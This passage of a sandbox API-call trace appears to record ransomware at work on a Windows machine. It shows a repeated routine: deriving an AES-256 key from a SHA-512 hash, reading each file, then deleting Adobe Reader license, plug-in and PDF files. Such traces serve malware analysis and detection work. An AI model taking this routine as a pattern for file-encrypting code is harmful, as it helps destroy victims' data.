lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.797] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.797] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.797] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.798] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\license.html")) returned 1 [0203.800] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.800] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.801] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.801] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.801] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.801] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe796 [0203.801] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.815] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.815] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.816] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.817] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\license.html")) returned 1 [0203.819] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.819] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.820] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.820] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.820] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.820] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ece3 [0203.820] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.849] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.849] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.849] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.850] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\license.html")) returned 1 [0203.853] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.854] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.854] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.854] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.854] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.854] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10d39 [0203.854] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.862] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.862] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.862] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.863] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\license.html")) returned 1 [0203.866] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.866] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.866] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.866] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.867] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.867] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2f5 [0203.867] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.879] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.879] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.879] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.880] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\license.html")) returned 1 [0203.881] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.882] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.882] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.882] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.882] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.882] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd34f [0203.882] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.890] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.890] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.890] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.892] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\license.html")) returned 1 [0203.893] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.893] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.894] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.894] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.894] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.894] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc8bf [0203.894] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.929] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.929] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.929] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.930] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html")) returned 1 [0203.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.932] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.933] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.933] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.933] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.933] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa69 [0203.933] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.940] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.940] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.940] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.941] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html")) returned 1 [0203.942] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.942] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.943] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.943] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.943] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.943] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a6af [0203.943] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.973] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.973] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.973] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.974] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html")) returned 1 [0203.985] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.990] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.991] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.010] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.010] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.061] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.061] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.141] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.181] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.238] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.238] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.407] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.407] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.527] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.606] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.606] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.642] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.678] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.774] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.774] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.869] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0204.971] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.148] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.148] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.270] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.286] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.335] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.336] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.505] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.554] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.601] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.601] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.652] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.699] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.728] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.728] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.801] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.855] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.903] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.904] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.954] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0205.989] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.074] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.074] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.078] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.129] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.337] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.337] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.448] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.504] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.556] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.556] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.577] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0206.578] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0206.578] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0206.578] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0206.578] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x724ee [0206.578] ReadFile (in: hFile=0x588, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0206.630] CryptDestroyHash (hHash=0x284d568) returned 1 [0206.630] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0206.630] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0206.631] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfsigqformalrep.pdf")) returned 1 [0206.684] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.732] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0206.732] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0206.732] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0206.733] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0206.733] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7ec63 [0206.733] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0206.779] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0206.779] CryptDestroyKey (hKey=0x284d568) returned 1 [0206.779] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0206.781] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\accessibility.api")) returned 1 [0206.785] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.823] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0206.828] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0206.829] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0206.829] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0206.829] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0206.829] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xae8a63 [0206.829] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0208.549] CryptDestroyHash (hHash=0x284d628) returned 1 [0208.549] CryptDestroyKey (hKey=0x284d568) returned 1 [0208.549] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.550] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api")) returned 1 [0208.637] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0208.637] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0208.637] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.637] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0208.638] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x217e [0208.638] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0208.653] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0208.653] CryptDestroyKey (hKey=0x284d568) returned 1 [0208.653] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.654] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc")) returned 1 [0208.665] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0208.674] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0208.686] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0208.687] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.687] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.687] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.687] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.687] GetFileSize (in: hFile=0x63c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcdd8 [0208.687] ReadFile (in: hFile=0x63c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.692] CryptDestroyHash (hHash=0x284d668) returned 1 [0208.692] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.692] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.693] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\dynamic.pdf")) returned 1 [0208.695] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.695] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.695] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.695] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.695] GetFileSize (in: hFile=0x640, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x892d [0208.695] ReadFile (in: hFile=0x640, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.702] CryptDestroyHash (hHash=0x284d768) returned 1 [0208.702] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.702] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.703] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\faces.pdf")) returned 1 [0208.705] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.705] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.705] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.705] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.705] GetFileSize (in: hFile=0x63c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc084 [0208.705] ReadFile (in: hFile=0x63c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.710] CryptDestroyHash (hHash=0x284d668) returned 1 [0208.710] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.710] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.711] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\pointers.pdf")) returned 1 [0208.712] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.713] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.713] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.713] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.713] GetFileSize (in: hFile=0x640, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c96 [0208.713] ReadFile (in: hFile=0x640, lpBuffer=0x3267c94, 